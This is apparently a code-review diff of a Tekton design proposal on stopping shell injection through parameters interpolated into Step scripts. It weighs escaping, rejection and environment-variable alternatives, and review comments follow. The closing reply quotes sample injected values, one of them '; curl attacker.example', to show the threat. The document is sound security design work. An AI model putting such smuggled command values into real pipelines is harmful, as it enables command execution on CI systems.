teps/0099-parameters-in-script.md

```diff
@@ -0,0 +1,479 @@
+brings consistency in how we supply both `Parameters` and `Results` to `Steps`.
+
+### 3. Provide an Escaped Form of `Parameters` as Tekton Variables for Injection
+
+This was the proposal in [TEP-0017][tep-0017].
+
+> In a Task or Pipeline, for each parameter `foo`, provide `$(params.foo.shell-escaped)`.
+>
+> This variable shall be escaped according to `printf '%q'` rules as used in bash.
+> For example, the literal string `Hello '\!"` becomes `Hello\ \'\\\!\"`. A script
+> which ran `echo $(params.foo.shell-escaped)` would print the literal string. The
+> escaped value would do the wrong thing when placed inside double or single quotes.
+
+```yaml
+  # Before
+  steps:
+  - name: foo
+    image: myimage
+    script: |
+      echo $(params.bar)
+  
+  # After
+  steps:
+  - name: foo
+    image: myimage
+    script: |
+      echo $(params.bar.shell-escaped)
+```
+
+##### Discussion
+
+This approach mutates the specification, but it is something we're already doing
+with implicit `Parameters` per [TEP-0023][tep-0023].
+
+### 4. Reject `Parameters` in `Script` and provide instructions to fix
+
+During validation we could detect `Parameters` used in `Script` blocks and return
+a helpful message to the user that they need to rewrite their `Task` to move the
+`Parameters` into environment variables.
+
+```yaml
+  # Before
+  steps:
+  - name: foo
+    image: myimage
+    script: |
+      echo $(params.bar)
+```
+
+When the Tekton Pipelines Controller sees this `Script` it rejects the `Task` submission
+with an error, such as:
+
+```
+spec.steps[0]: params cannot be referenced from a script, consider moving
+into an environment variable on the Step.
+```
+
+```yaml      
+  # After
+  steps:
+  - name: foo
+    image: myimage
+    env:
+    - name: PARAM_BAR
+      value: $(params.bar)
+    script: |
+      echo ${PARAM_BAR}      
+```
+
+##### Discussion
+
+Non-mutating but doesn't help the user as directly as mutating the spec.
+
+### 5. Optionally Project `Parameters` as Environment Variables in `Steps`
+
+Building on the first alternative above, another approach would be to make
+the implicit projection optional, where it only applies to a subset of
+`Parameters` with the suffix `env`.
+
+```yaml
+  # Before
+  steps:
+  - name: foo
+    image: myimage
+    script: |
+      echo $(params.bar)
+  
+  # After
+  steps:
+  - name: foo
+    image: myimage
+    script: |
+      echo $(params.bar.env)
+      
+  # After - Resolved
+  steps:
+  - name: foo
+    image: myimage
+    env:
+    - name: PARAM_BAR
+      value: $(params.bar)
+    script: |
+      echo ${PARAM_BAR}
+```
+
+##### Discussion
+
+This approach is flexible: provide a safer and more reliable interpolation while
+still allowing code injection if needed. Even more, it is backwards compatible.
+However, the string replacement in `Script` would only work for shell scripts .
+
+## Open Questions
+
+1. Is it sufficient to address `Parameters` in `Script` only, or do we need to
```

Comment:
Looking at [the list of variables available to Tasks](https://github.com/tektoncd/pipeline/blob/main/docs/variables.md#variables-available-in-a-task) the majority should be filtered through various forms of escaping. However I still feel uneasy about any of those values being injected directly into `script` because we don't have an audit of the kinds of escaping taking place across the codebase wrt those vars.  I'd be happy to take this on if we decide to move to implementable in some form here but decide to only limit the scope to `params` right now.

Reply:
IMHO interpolating simple things like paths and names of namespaces and so on should be fairly safe.  The value of `context.taskRun.Namespace` will never be `--target=/hack-me` or `; curl attacker.example`.  The only real attack vector is that of parameters that can contain _arbitrary data_.